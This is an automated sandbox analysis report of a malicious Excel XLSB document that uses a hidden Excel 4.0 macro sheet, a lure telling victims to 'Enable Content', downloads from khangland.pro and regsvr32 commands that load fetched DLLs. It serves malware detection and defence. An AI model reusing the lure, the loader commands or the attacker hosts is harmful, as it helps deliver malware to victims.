
Windows Analysis Report plan-515372324.xlsb

Overview

General Information

Sample Name: plan-515372324.xlsb
Analysis ID: 442112
MD5: 08e52afbefa423fb9f1ea0af88a4880e
SHA1: 2d688dfee28f75553bc1d3633f891d2e70e0408b
SHA256: aaa32ff3e41c61fe828f0850e702f5ed7ffd6177c4bf80ed15324525537f44cd
Detection

Hidden Macro 4.0
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6272 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • splwow64.exe (PID: 6156 cmdline: C:\Windows\splwow64.exe 12288 MD5: 8D59B31FF375059E3C32B17BF31A76D5)
    • regsvr32.exe (PID: 6464 cmdline: regsvr32 ..\palpy1.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 6672 cmdline: regsvr32 ..\palpy2.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: regsvr32 ..\palpy1.dll, CommandLine: regsvr32 ..\palpy1.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6272, ProcessCommandLine: regsvr32 ..\palpy1.dll, ProcessId: 6464

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: plan-515372324.xlsb | Virustotal: Detection: 15%
Source: plan-515372324.xlsb | ReversingLabs: Detection: 21%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 103.28.39.29:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.244.121.13:443 -> 192.168.2.4:49741 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Section loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe
Source: global traffic | DNS query: name: khangland.pro
Source: global traffic | TCP traffic: 192.168.2.4:49739 -> 103.28.39.29:443
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS traffic detected: queries for: khangland.pro
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://api.aadrm.com/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://api.cortana.ai
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://api.diagnostics.office.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://api.microsoftstream.com/api/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://api.office.net
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://api.onedrive.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://apis.live.net/v5.0/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://augloop.office.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://augloop.office.com/v2
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://cdn.entity.
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://clients.config.office.net/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://config.edge.skype.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://cortana.ai
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://cortana.ai/api
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://cr.office.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://dataservice.o365filtering.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://dataservice.o365filtering.com/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://dev.cortana.ai
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://devnull.onenote.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://directory.services.
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://enrichment.osi.office.net/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://graph.ppe.windows.net
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://graph.ppe.windows.net/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://graph.windows.net
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://graph.windows.net/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://incidents.diagnostics.office.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://lifecycle.office.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://login.microsoftonline.com/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://login.windows.local
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://management.azure.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://management.azure.com/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://messaging.office.com/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://ncus.contentsync.
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://ncus.pagecontentsync.
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://officeapps.live.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://onedrive.live.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://onedrive.live.com/embed?
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://osi.office.net
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://outlook.office.com/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://outlook.office365.com/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://pages.store.office.com/review/query
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://powerlift.acompli.net
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://settings.outlook.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://shell.suite.office.com:1443
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://skyapi.live.net/Activity/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://staging.cortana.ai
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://store.office.cn/addinstemplate
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://store.office.com/addinstemplate
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://store.office.de/addinstemplate
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://tasks.office.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://templatelogging.office.com/client/log
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://web.microsoftstream.com/video/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://webshell.suite.office.com
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://wus2.contentsync.
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://wus2.pagecontentsync.
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 66988849-8D57-437E-97F2-4EBE1CC53C33.1.dr | String found in binary or memory: https://www.odwebp.svc.ms
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown | HTTPS traffic detected: 103.28.39.29:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.244.121.13:443 -> 192.168.2.4:49741 version: TLS 1.2

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 8 | Screenshot OCR: Enable Content WHY I CANNOT OPEN THIS DOCUMENT? W You are using iOS or Android, please use Desktop
Found abnormal large hidden Excel 4.0 Macro sheet
Source: plan-515372324.xlsb | Initial sample: Sheet size: 9243
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
Source: classification engine | Classification label: mal72.expl.evad.winXLSB@7/10@2/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{CB9944C5-26E1-485A-9CD8-E6A080068253} - OProcSessId.dat
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: plan-515372324.xlsb | Virustotal: Detection: 15%
Source: plan-515372324.xlsb | ReversingLabs: Detection: 21%
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\palpy1.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\palpy2.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Automated click: OK
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: plan-515372324.xlsb | Initial sample: OLE zip file path = xl/media/image5.png
Source: plan-515372324.xlsb | Initial sample: OLE zip file path = xl/media/image4.png
Source: plan-515372324.xlsb | Initial sample: OLE zip file path = xl/media/image3.png
Source: plan-515372324.xlsb | Initial sample: OLE zip file path = xl/media/image2.png
Source: plan-515372324.xlsb | Initial sample: OLE zip file path = xl/media/image6.png
Source: plan-515372324.xlsb | Initial sample: OLE zip file path = xl/media/image1.png
Source: plan-515372324.xlsb | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: plan-515372324.xlsb | Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
